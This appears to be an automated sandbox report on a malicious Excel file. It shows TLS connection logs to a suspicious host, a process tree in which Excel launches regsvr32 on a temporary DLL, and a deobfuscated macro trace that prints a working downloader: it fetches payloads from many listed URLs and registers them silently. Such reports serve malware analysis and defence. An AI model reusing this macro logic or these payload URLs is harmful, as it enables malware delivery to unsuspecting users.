Jan 12, 2021 01:44:42.762681007 CET	77.220.64.37	443	192.168.2.22	49245	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:44.949043036 CET	77.220.64.37	443	192.168.2.22	49249	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:47.099344015 CET	77.220.64.37	443	192.168.2.22	49253	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:49.200659990 CET	77.220.64.37	443	192.168.2.22	49257	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:51.536020994 CET	77.220.64.37	443	192.168.2.22	49261	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:54.069024086 CET	77.220.64.37	443	192.168.2.22	49265	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:56.163307905 CET	77.220.64.37	443	192.168.2.22	49269	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:44:58.286957026 CET	77.220.64.37	443	192.168.2.22	49273	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:00.440151930 CET	77.220.64.37	443	192.168.2.22	49277	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:02.480573893 CET	77.220.64.37	443	192.168.2.22	49281	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:04.587567091 CET	77.220.64.37	443	192.168.2.22	49285	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:06.703485012 CET	77.220.64.37	443	192.168.2.22	49289	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:08.957114935 CET	77.220.64.37	443	192.168.2.22	49293	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:11.386787891 CET	77.220.64.37	443	192.168.2.22	49297	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:13.495340109 CET	77.220.64.37	443	192.168.2.22	49301	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:15.603847027 CET	77.220.64.37	443	192.168.2.22	49305	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:17.696660042 CET	77.220.64.37	443	192.168.2.22	49309	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:19.800482035 CET	77.220.64.37	443	192.168.2.22	49313	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:21.920305967 CET	77.220.64.37	443	192.168.2.22	49317	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:24.042557955 CET	77.220.64.37	443	192.168.2.22	49321	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:26.353760958 CET	77.220.64.37	443	192.168.2.22	49325	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:28.783770084 CET	77.220.64.37	443	192.168.2.22	49329	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:30.906864882 CET	77.220.64.37	443	192.168.2.22	49333	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:33.014612913 CET	77.220.64.37	443	192.168.2.22	49337	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:35.135796070 CET	77.220.64.37	443	192.168.2.22	49341	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:37.273354053 CET	77.220.64.37	443	192.168.2.22	49345	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:39.394809008 CET	77.220.64.37	443	192.168.2.22	49349	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:41.501972914 CET	77.220.64.37	443	192.168.2.22	49353	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:43.740381956 CET	77.220.64.37	443	192.168.2.22	49357	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:46.466078043 CET	77.220.64.37	443	192.168.2.22	49362	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:48.672018051 CET	77.220.64.37	443	192.168.2.22	49366	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:50.877825022 CET	77.220.64.37	443	192.168.2.22	49370	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:52.970568895 CET	77.220.64.37	443	192.168.2.22	49374	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:55.058487892 CET	77.220.64.37	443	192.168.2.22	49378	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:57.165930033 CET	77.220.64.37	443	192.168.2.22	49382	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:45:59.286123991 CET	77.220.64.37	443	192.168.2.22	49386	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:46:01.400849104 CET	77.220.64.37	443	192.168.2.22	49390	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:46:03.514745951 CET	77.220.64.37	443	192.168.2.22	49394	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 01:46:05.621118069 CET	77.220.64.37	443	192.168.2.22	49398	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2292 Parent PID: 584

General

Start time:	01:43:38
Start date:	12/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f1d0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2500 Parent PID: 2292

General

Start time:	01:43:45
Start date:	12/01/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Imagebase:	0xffcb0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2504 Parent PID: 2500

General

Start time:	01:43:46
Start date:	12/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Imagebase:	0xc80000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: DW20.EXE PID: 2448 Parent PID: 2292

General

Start time:	01:44:04
Start date:	12/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
Wow64 process (32bit):	false
Commandline:	'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840
Imagebase:	0x13fa10000
File size:	995024 bytes
MD5 hash:	45A078B2967E0797360A2D4434C41DB4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: DWWIN.EXE PID: 1296 Parent PID: 2448

General

Start time:	01:44:04
Start date:	12/01/2021
Path:	C:\Windows\System32\DWWIN.EXE
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dwwin.exe -x -s 1840
Imagebase:	0xffeb0000
File size:	152576 bytes
MD5 hash:	25247E3C4E7A7A73BAEEA6C0008952B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Module1

Declaration

Line	Content
1	Attribute VB_Name = "Module1"

Executed Functions

Function pagesREviewsd, APIs: 16, Strings: 7, Number of lines: 22, Relevance: 56.022

APIs	Meta Information
Cells
SpecialCells
xlCellTypeConstants
value
Chr
Row
Split
Split
Cells
Replace	Replace("SET.NAME("b0b",CHAR(101))","?","http://omescortcargo.com/jzj2gw.zip") -> SET.NAME("b0b",CHAR(101)) Replace("SET.NAME("v0","n")","?","https://benditoassociates.com/l7rgi3xyd.zip") -> SET.NAME("v0","n") Replace("SET.NAME("i0","J")","?","http://www.sustaino2.com/q0ig4v.rar") -> SET.NAME("i0","J") Replace("CANCEL.KEY(TRUE)","?","https://dom-chel74.ru/ymuyks.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("w00","\")","?","http://impulsetest.co.uk/nbk13g.rar") -> SET.NAME("w00","\") Replace("IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE))","?","http://tamarackdaycare.ca/rrv2vk8.rar") -> IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE)) Replace("SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00)","?","http://vegainwest.pl/uom2b4zog.rar") -> SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00) Replace("SET.NAME("o0","32")","?","https://gatewayips.com/mu3nv17.zip") -> SET.NAME("o0","32") Replace("CANCEL.KEY(TRUE)","?","http://suddisagara.com/y755j7515.zip") -> CANCEL.KEY(TRUE) Replace("SET.NAME("oo0","?")","?","http://truxiellogroup.com/d0l359.rar") -> SET.NAME("oo0","http://truxiellogroup.com/d0l359.rar") Replace("SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll")","?","http://vegainwest.pl/uom2b4zog.rar") -> SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll") Replace("SET.NAME("w00",b0b)","?","http://148.72.88.102/iszvgm.zip") -> SET.NAME("w00",b0b) Replace("SET.NAME("ba",".")","?","http://laboratoriostabbler.com/c942pn.rar") -> SET.NAME("ba",".") Replace("SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00)","?","https://midas-mortgage.com/raycph0.zip") -> SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00) Replace("SET.NAME("v0","O")","?","http://laboratoriostabbler.com/c942pn.rar") -> SET.NAME("v0","O") Replace("SET.NAME("wegb","URLM"&v0&"N")","?","http://jobmonster.atwebpages.com/r562ibujk.rar") -> SET.NAME("wegb","URLM"&v0&"N") Replace("CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0)","?","https://uralflex.com/kaf3bihtd.rar") -> CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0) Replace("SET.NAME("ohgdfww","h"&w00&"llEx"&w00&"cut"&w00)","?","https://viralizi.id/pme1b4.rar") -> SET.NAME("ohgdfww","h"&w00&"llEx"&w00&"cut"&w00) Replace("SET.NAME("wegb","Sh"&w00&"ll")","?","https://gatewayips.com/mu3nv17.zip") -> SET.NAME("wegb","Sh"&w00&"ll") Replace("CALL(wegb&o0,"S"&ohgdfww&"A",i0&i0&"CCCC"&i0,0,v0&"p"&w00&"n","r"&w00&"gsvr"&o0," -s "&bb&ab&ba,0,0)","?","https://sctask.smartconnexxionz.com/jufk0v.rar") -> CALL(wegb&o0,"S"&ohgdfww&"A",i0&i0&"CCCC"&i0,0,v0&"p"&w00&"n","r"&w00&"gsvr"&o0," -s "&bb&ab&ba,0,0) Replace("SET.NAME("b0b",CHAR(101))","?","https://www.urban-mosaic.com/ana58n.zip") -> SET.NAME("b0b",CHAR(101)) Replace("SET.NAME("v0","n")","?","http://suddisagara.com/y755j7515.zip") -> SET.NAME("v0","n") Replace("SET.NAME("i0","J")","?","http://inmindppe.com/eb3kd1le.zip") -> SET.NAME("i0","J") Replace("CANCEL.KEY(TRUE)","?","https://gatewayips.com/mu3nv17.zip") -> CANCEL.KEY(TRUE) Replace("SET.NAME("w00","\")","?","http://www.sustaino2.com/q0ig4v.rar") -> SET.NAME("w00","\") Replace("IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE))","?","https://dsenterprize.co.za/x3wwm4.zip") -> IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE)) Replace("SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00)","?","http://truxiellogroup.com/d0l359.rar") -> SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00) Replace("SET.NAME("o0","32")","?","http://bahia.consultoriass.es/xka8p2.rar") -> SET.NAME("o0","32") Replace("CANCEL.KEY(TRUE)","?","https://elcookcore.com/s2jetj.zip") -> CANCEL.KEY(TRUE) Replace("SET.NAME("oo0","?")","?","http://148.72.88.102/iszvgm.zip") -> SET.NAME("oo0","http://148.72.88.102/iszvgm.zip") Replace("SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll")","?","https://conceptimagine.ro/bpd9z5j7u.zip") -> SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll") 